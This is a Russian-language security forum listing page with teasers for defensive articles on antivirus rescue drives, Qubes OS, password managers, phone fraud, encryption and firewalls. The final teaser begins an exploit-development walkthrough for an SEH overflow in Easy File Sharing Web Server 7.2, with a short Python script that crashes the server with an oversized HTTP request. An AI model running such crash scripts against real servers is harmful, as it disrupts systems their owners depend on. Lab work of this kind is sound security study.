• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Защита информации

Современные методы обработки и хранения данных предполагают использование оборудования, которое не защищает от угрозы их потери, изменения, передачи сторонним лицам. Именно поэтому защита информации становится одним из ключевых направлений развития IT. В это понятие включают защищённость данных в случае несанкционированного доступа, ошибок персонала, поломки оборудования или выхода из строя программного обеспечения. Обеспечить защиту помогают системы управления доступом, программы регистрации, идентификации, аутентификации пользователей, межсетевые экраны, использование антивирусного ПО, криптографические методы. При построении структуры информационной безопасности используется комплексный подход, который подразумевает одновременное применение программных, криптографических, аппаратных средств. В этом разделе собраны материалы о защите информации, которая поможет вам обеспечить необходимый уровень безопасности данных.

Статья Переносной антивирус. Создаем флешку для защиты Windows

  • 2 288
  • 1
Logotype.png

Введение
Угроза безопасности никогда не подбиралась так близко к нашим системам. Новости каждый день говорят о новых видах вредоносного ПО, а ты не успеваешь обновиться на более продвинутую и безопасную защиту. Поэтому в такие моменты происходят сбои и система заражается очень неприятными и опасными вирусами. Чтобы этого избежать и в случаи сбоев системы не идти скачивать новую винду я предлагаю тебе создать аварийный план восстановления системы. Он поможет тебе избавится от угрозы и вернуть систему в прежний вид.

План работы
Любая работа должна иметь план. Поэтому давай пробежимся по нему и я расскажу, что в этой статье будет происходить. Первым делом я познакомлю тебя с компактными утилитами, которые обязательно должны быть на твоей флешки. Они быстро и эффективно...

Статья Обзор Qubes OS

  • 3 756
  • 0

Введение

Приветствую всех читателей этой статьи! Ни раз в моих статьях поднимался вопрос об анонимности в сети, а так же о защищённых и анонимных операционных системах. Прошу заметить, что абсолютно анонимных операционных систем нет и всё зависит от того, как уметь ими пользоваться. Сегодня хочу рассказать вам об ещё одной операционной системе, которую так же можно включить в список защищённых и анонимных ОС, а конкретно про Qubes OS. Данная система, прошу заметить, весьма интересно устроена. Собственно, давайте же приступать!

qubes_os.png

Что такое Qubes OS?

Qubes OS - это бесплатный и ориентированный на безопасность Linux-дистрибутив на основе Fedora. Преимуществом данной операционной системы является виртуализация на основе Xen. Если говорить более простым языком, то для...

Статья Открытый код. Топ инструментов направленных на конфиденциальность.

  • 2 219
  • 1

prew.jpg

Введение

Приветствую всех читателей данной статьи! Продолжаю продвигать инструменты и программы с открытым исходным кодом в массы, поэтому сегодня подготовил вам список таких программ и скриптов. Возможно что-то из списка может вам особенно приглянуться, так что без лишних предисловий сразу начинаем наш топ!

Статья Открытый код. KeePassXC вместо KeePass.

  • 4 394
  • 4

prw.jpg

Введение

И снова рад приветствовать дорогих читателей данной статьи! Cегодня хочу рассказать вам о менеджере паролей KeePassXC. В своей прошлой статье про составление и хранение паролей я ошибочно рекомендовал вам программу KeePass для хранения паролей, но далее, как оказалось, данное программное обеспечение полно различных уязвимостей, включая недавнюю CVE-2023-24055 KeePass 2.5x. В связи с этим хочу привести вам альтернативу, а заодно и описать данную уязвимость.

KeePassXC

KeePassXC - это современный, безопасный менеджер паролей с открытым исходным кодом, который хранит и управляет вашей самой конфиденциальной информацией. Данный ПО есть на Linux и на Windows. Установку демонстрировать буду конечно же на Linux. Делается это...

Статья Телефонные мошенники, снова поговорим о них

  • 4 222
  • 4
phone.jpg

Дисклеймер
Вся указанная в данной статье информация является плодом моего умозаключения. Информация получена из разных общедоступных источников и носит исключительно ознакомительный характер.

Приветствую, уважаемый читатель! Пришла пора снова поговорить о телефонных жуликах и социальной инженерии. Я ранее уже писал длинную подробную статью по методам их воздействия, но, к моему великому сожалению, людей продолжают обманывать. Это значит, что моей статье не было уделено достаточно внимания. Давайте в этот раз я постараюсь передать весь материал более кратко и емко.

Ничего не стоит на месте, каждый день наука и технологии развиваются. Как ни странно, начали развиваться и банковские мошенники. Скорее всего, большинство из вас сталкивались с...

Статья Открытый код. Шифруем картинки и файлы

  • 3 113
  • 1

Введение

Приветствую всех читателей этой статьи, с неё я хочу начать серию статей в которых я буду обозревать различные программы с открытым исходным кодом, которые как-либо затрагивают сферу информационной безопасности. Сегодня хочу обозреть и вывести в свет программы, с которыми думаю знаком не каждый, поэтому будем это исправлять.

encryption.png

В чём преимущества программ с открытым исходным кодом?

На самом деле если сравнивать с программным обеспечением которое является закрытым(с закрытым исходным кодом), то у программ с открытым исходным кодом есть множество весомых преимуществ: такие программы являются прежде всего бесплатными изначально, так же благодаря открытости исходного кода, мы можем без проблем увидеть и понять как работает программа, каждый желающий может внести свои изменения...

Статья Создаём пароли методом крестражей

  • 4 554
  • 4

pass.jpg

Введение

Приветствую всех читателей данной статьи! Перед тем как начать, хотел бы задать вам несколько вопросов. Как часто вы думаете о том, как вас могут взломать или угнать аккаунт из какой-либо социальной сети? Лично я думаю об этом всегда. Можно сказать, что я параноик и вы будете абсолютно правы. Но давайте теперь ответим на следующий вопрос: есть ли нам что скрывать? И здесь безусловно ответ положительный, всем нам есть что скрывать. Если я слышу от человека: "Мне нечего скрывать", я знаю что этот человек ошибается. Все мы что-то скрываем: будь это фотографии, видео, документы, мнение о других, планы, свои мысли. Поэтому не стоит заниматься самообманом, а нужно защищать свои секреты надёжным паролем, ведь именно в социальных сетях практически вся наша жизнь.

Статья Check Point Firewall - скачать бесплатно и установить для практики в виртуальной среде

  • 3 948
  • 4
cp-26.png


Всем доброго дня! Продолжаем знакомство с тройкой ведущих МСЭ (мой рассказ о Fortigate здесь), и сегодня я расскажу где найти (на офф сайте), скачать и установить в виртуальной среде (VMWare ESXi/Workstation)
новейшую (R81.10) на сегодня версию Check Point фаервола.

Скачиваем образ ISO с официального сайта

Первым шагом будет регистрация на сайте . Регистрируемся с любой почтой к которой имеем доступ.

cp-01.png


cp-02.png


Ищем в гугле новую на данный момент версию Check Point “Check Point r81.10 fresh install”. Результат должен привести на сайт usercenter.checkpoint.com.
Переходим по первой ссылке на страницу загрузки образа...

Статья О стойкости, хэшировании и подборе паролей с помощью Python

  • 3 578
  • 0
О том, как важно создавать стойкие пароли для ваших учетных записей не говорил только ленивый. И действительно, чем сложнее пароль, тем меньше вероятность того, что его взломают. Только если сам пользователь с помощью СИ сообщит его хакеру или введет на фишинговой странице.

Давайте рассмотрим небольшой пример. Вот пароль: FhjpEgfkYfkfgeFpjhf4558. По сути, это беспорядочный (нет) набор символов. Ну да не в этом дело. В сети множество калькуляторов для вычисления времени на подбор пароля методом прямого перебора, то есть брут-форса. Давайте посмотрим, сколько времени будет взламываться данный пароль.

0000.png

В общем, я даже не знаю, как перевести данное число, но судя по всему много. За это время Вселенная разлетится так далеко, что мы перестанем видеть звезды, а от Солнечной системы останется одна лишь звездная пыль.

В общем и целом, к чему я клоню. Допустим, у вас появился, откуда не возьмись md5-хэш пароля. Понятное дело, что...

Статья Easy File Sharing Web Server 7.2 SEH overflow

  • 1 240
  • 0
Тестирование проводилось на Windows XP SP3 x86 En (no dep)

Уязвимое ПО:

Запускаем ПО

1640554135976.png


И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import pack
import socket
payload = "A"*5000

exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect(("127.0.0.1",80))
exploit.send("GET " + payload + " HTTP/1.1\r\n")
exploit.close()

1640554171427.png


посмотрим Chain SEH

1640554187682.png


Сгенерирум строку паттерн используя плагин mona.py

!mona pc 50000

1640554203618.png


Скопируем сгенерированную строку ASCII строку в наш триггер сплойт...